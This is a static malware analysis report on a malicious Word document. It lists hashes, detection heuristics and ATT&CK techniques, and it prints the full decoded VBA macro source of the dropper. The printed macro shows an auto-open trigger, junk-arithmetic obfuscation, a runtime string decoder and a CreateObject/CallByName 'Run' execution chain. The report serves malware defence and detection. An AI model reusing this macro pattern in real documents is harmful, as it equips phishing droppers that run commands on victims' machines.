Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10281a188a26dbb1…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 79.0 KB
Created: 2018-03-22 11:47:00
Authoring application: Microsoft Office Word
First seen: 2019-02-26
MD5: 2128689698b9a7e496b20bac4ddd42b1
SHA-1: 4d6f2012d5521f240f10b53c769d250d02cd5697
SHA-256: 10281a188a26dbb10562bdc6f5467abad4b0e7fe73672b48a11fdd55819f81f3
Risk score: 290

Malware Insights

MITRE ATT&CK:
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1140 Deobfuscate or Obfuscate Malicious Files or Information

The sample is a malicious Office document containing VBA macros. The 'AutOOpen' macro (VBA procedure names are case-insensitive, so Word treats it as AutoOpen) runs automatically when the document is opened, and the 'SE_ENABLE_LURE' heuristic indicates the document prompts the user to enable macros. The VBA code is obfuscated with junk arithmetic and strings that are only decoded at runtime; the 'paulstorm_Change' handler instantiates a COM object whose ProgID is resolved at runtime through 'tunzhuan' via 'CreateObject', then 'sofiaaspasia' invokes that object's 'Run' method by name via 'CallByName' on a command string assembled from the decoded fragments. This indicates the macro executes a command, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6481603-0' further supports its classification as a dropper.

Heuristics (10)

  • ClamAV: Doc.Dropper.Agent-6481603-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6481603-0
  • Heap-spray pattern detected [high, SC_HEAP_SPRAY]
    Repeated 0x04 bytes found; attempted x86 opcode disassembly of the region
  • VBA macros detected [medium, OLE_VBA_MACROS] (4 related findings)
    Document contains VBA macro code
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    Matched lines in script:
    Private Sub paulstorm_Change()
    Set guilecla = CreateObject(tunzhuan)
    volvos70 = 87 * 16
  • CallByName call [high, OLE_VBA_CALLBYNAME]
    Matched lines in script:
    mn1 = True
    CallByName emera777, mn, VbMethod, sitiakuloP.paulstorm, mn0, mn1
    End Sub
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low, OLE_VBA_AUTOOPEN]
    Matched lines in script:
    Attribute VB_Customizable = True
    Sub AutOOpen()
    pataccess
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure [medium, SE_ENABLE_LURE]
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    All six are XML namespace identifiers (RDF, Adobe XMP, Dublin Core, DrawingML) carried in embedded metadata, not network contact points; the macro's actual command string is only assembled at runtime and is not present here in clear text.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7236 bytes
SHA-256: b425dd209cb76dcf045c9bed4a930e552a16739873f96c9d74b9f0db6b2f2c32

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
pataccess
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
End Sub

Attribute VB_Name = "anilichs"
Function tunzhuan()
tunzhuan = ssegold1976
End Function

Function ssegold1976()
ssegold1976 = green3721(avosamenA.smarailg)
End Function

Function love123123()
love123123 = avonikhsaH.melissa158
End Function

Function gasmypoa(deenheit, diedligh)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
gasmypoa = green3721(sitiakuloP.yeahconnie) + deenheit + green3721(avosamenA.October100) + _
 diedligh + green3721(sitiakuloP.linkskiing + sitiakuloP.ausjurer) + diedligh
End Function

Function redskin158()
redskin158 = "u.iaoghgEmaQRQai.uipEs/l"
End Function

Function golfroyals(AVORESSAB)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
golfroyals = green3721(wizard1971 + avosamenA.dreamdell) + AVORESSAB + _
green3721(avosamenA.avonayvele) + AVORESSAB + green3721(avonikhsaH.KONETEVS)
End Function

Sub sofiaaspasia(emera777)
mn = "Run"
mn0 = 0
mn1 = True
CallByName emera777, mn, VbMethod, sitiakuloP.paulstorm, mn0, mn1
End Sub

Function ANIBELAKHS()
ANIBELAKHS = sitiakuloP.loner_ru
End Function

Function green3721(pubitive)
wayact53 = ""
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
roupier43 = Len(pubitive)
For cjverm78 = 1 To roupier43
pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
wayact53 = wayact53 + duchylau(SOUTH407(pubitive, cjverm78), 4)
Next cjverm78
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
green3721 = wayact53
End Function

Function acTpoJIep(ziggysurf)
GHJYBWFN = robin459(9, 4) - 1
staivou5 = robin459(53, 1)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
love2582 = SOUTH407(love123123, staivou5)
For janearse = 2 To GHJYBWFN
staivou5 = robin459(27, 1)
pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
love2582 = love2582 + SOUTH407(ziggysurf, staivou5)
Next janearse
staivou5 = robin459(37, 1)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
acTpoJIep = ANIGREVOS(love2582, staivou5)
End Function






Attribute VB_Name = "avonikhsaH"
Attribute VB_Base = "0{C45A907D-3A63-4B6E-B210-20B309999378}{99CFF111-9347-474B-A9BC-83E074BC80B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub pamat7007_Change()
mikefuckme = acTpoJIep(carlfaith)
wqsbsteph = acTpoJIep(carlfaith)
HCIVOKHCIRTEP = acTpoJIep(osuucoos)
insidepa = acTpoJIep(osuucoos)
kathypercy = 89 + 32
kathypercy = 124 - 2
kathypercy = 74 * 139 + 17 + 7
kathypercy = kathypercy * 143 - 7
kathypercy = 5 - 89 - 13
oker1506 mikefuckme, wqsbsteph, HCIVOKHCIRTEP, insidepa
End Sub

Attribute VB_Name = "avosamenA"
Attribute VB_Base = "0{EEA0A116-C6C3-4531-9ECA-A3C133286C9D}{50C45D01-88EA-405E-90C0-96E7AF5936EE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False



Attribute VB_Name = "gb102456"
Function carlfaith()
carlfaith = avosamenA.canonbozo
End Function

Function osuucoos()
osuucoos = sitiakuloP.avonamsI
End Function

Sub pataccess()
Randomize
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
avonikhsaH.pamat7007 = "inosenig"
End Sub

Function saintbit(ftpgandalf, helpmeandy)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
saintbit = green3721(avosamenA.apodpani) + helpmeandy + green3721(avosamenA.eucarevi) + _
helpmeandy + green3721(avosamenA.rubygalaxy) + ftpgandalf + _
green3721(avosamenA.hvfdbh2018 + redskin158 + avosamenA.champsshit) + ftpgandalf + green3721(avosamenA.hvfdbh2018)
End Function

Function frontrugby()
frontrugby = avonikhsaH.password34
End Function

Function duchylau(applescout As String, blade333 As Integer) As String
Dim boufulad As Integer
boufulad = 0
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
For NELATNAP = 1 To 90
If (SOUTH407(frontrugby, NELATNAP) = applescout) Then
   boufulad = NELATNAP
   pat52082 = 108 + 97
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
    Exit For
End If
Next NELATNAP
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
boufulad = IIf(boufulad - blade333 <= 0, 90 + boufulad - blade333, boufulad - blade333)
duchylau = SOUTH407(frontrugby, boufulad)
End Function

Function wizard1971()
wizard1971 = "smhoaiuEmaQE,uRQai.uipEs/l"
End Function

Function robin459(amuvampl, tOiRFJAxa)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
robin459 = ornchlol(Int((amuvampl * Rnd()) + tOiRFJAxa))
End Function

Function ornchlol(sertnanc)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
ornchlol = CInt(sertnanc)
End Function

Function oker1506(damian09, VEHSIBAK, udredboss, binkymegan)
pat52082 = 108 + 97
pat52082 = 93 + 13 - 73 - 8
pat52082 = 139 - 72 - 4
pat52082 = pat52082 * pat52082 * 64 + 118 * 10
sitiakuloP.paulstorm = gasmypoa(damian09, VEHSIBAK) + saintbit(damian09, udredboss) + golfroyals(binkymegan)
End Function

Function SOUTH407(drolterr, bullorion)
SOUTH407 = Mid(drolterr, bullorion, 1)
End Function

Function ANIGREVOS(future200, Balumba)
ANIGREVOS = future200 + SOUTH407(ANIBELAKHS, Balumba)
End Function

Attribute VB_Name = "sitiakuloP"
Attribute VB_Base = "0{B541ABA7-4ECE-4CAF-94C0-153F68C799EB}{3ADA21AA-DA0E-48BB-B83B-451C8052760B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub CheckBox1_Click()
MsgBox "Ok"
End Sub

Private Sub CommandButton1_Click()
MsgBox "Ok"
End Sub

Private Sub Label1_Click()
MsgBox "Ok"
End Sub

Private Sub paulstorm_Change()
Set guilecla = CreateObject(tunzhuan)
volvos70 = 87 * 16
volvos70 = volvos70 - volvos7
volvos70 = 97 * 142 - 2 - 63 - 10
volvos70 = volvos70 * volvos7
sofiaaspasia guilecla
End Sub

Private Sub ToggleButton1_Click()
MsgBox "Ok"
End Sub